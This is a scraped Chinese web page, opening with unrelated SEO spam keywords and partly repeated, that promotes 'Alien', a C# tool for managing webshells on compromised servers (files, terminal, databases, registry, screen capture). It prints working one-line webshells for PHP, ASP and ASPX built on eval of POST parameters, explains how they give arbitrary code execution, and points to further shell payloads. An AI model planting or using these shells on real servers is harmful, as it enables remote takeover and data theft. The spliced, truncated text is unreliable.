泛华建设集团网站,建设网站的提成是多少,21天打造你的个人品牌,建设学分银行网站策划书Alien
项目简介
语言
C# .NET Framework V4.8
功能 File Manager #xff08;可显示图片#xff0c; 可SearchFile#xff09; 虚拟终端 数据库 注册表 监控 截图 系统信息
项目描述
一句话木马
一句话木马是在渗透测试中用来控制服务器的工具 强大之处在于木…Alien
项目简介
语言
C# .NET Framework V4.8
功能 File Manager 可显示图片 可SearchFile 虚拟终端 数据库 注册表 监控 截图 系统信息
项目描述
一句话木马
一句话木马是在渗透测试中用来控制服务器的工具 强大之处在于木马本身体积小不易发现 以下是最简单的一句话木马
PHP ?php eval($_POST[password]);?
ASP %execute(request(password))%
ASPX % Page LanguageJscript%%eval(Request.Item[password])%当然 Alien还可以使用asmx ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
关于JSP webshell
目前只有比较原始的菜刀版本 之后可能会加上蚁剑和冰蝎 shell有进行更改 新增了可以显示图片的功能
关于NodeJS webshell
由于NodeJS特性 原理跟一般php asp aspx等动态语言的shell不同 NodeJS目的重在管理而非渗透
伺服器
Windows Linux Unix MacOS
Database管理
MySQL PHP
交通 https://github.com/malbuffer4pt/DBer
SQL Server ASP ASPX ASMX ASHX
原理
以PHP为例子 eval可以把string以PHP Code去执行 如果eval中带有可控变量那么就可以执行任意代码。 如eval$_POST[a]; HTTP POST aphpinfo(); 就可以执行phpinfo;
注意! 工具Payloads文件夹内有符合恶意程序的Payload 可能会被防毒删除 目前只有删减版但部份代码没有删除Disassemble应该会有奇怪但无法使用的东西
图片 下载链接
一款新的webshell管理工具https://mp.weixin.qq.com/s/LBFCvIHLz8GwzZIxWXsd5w
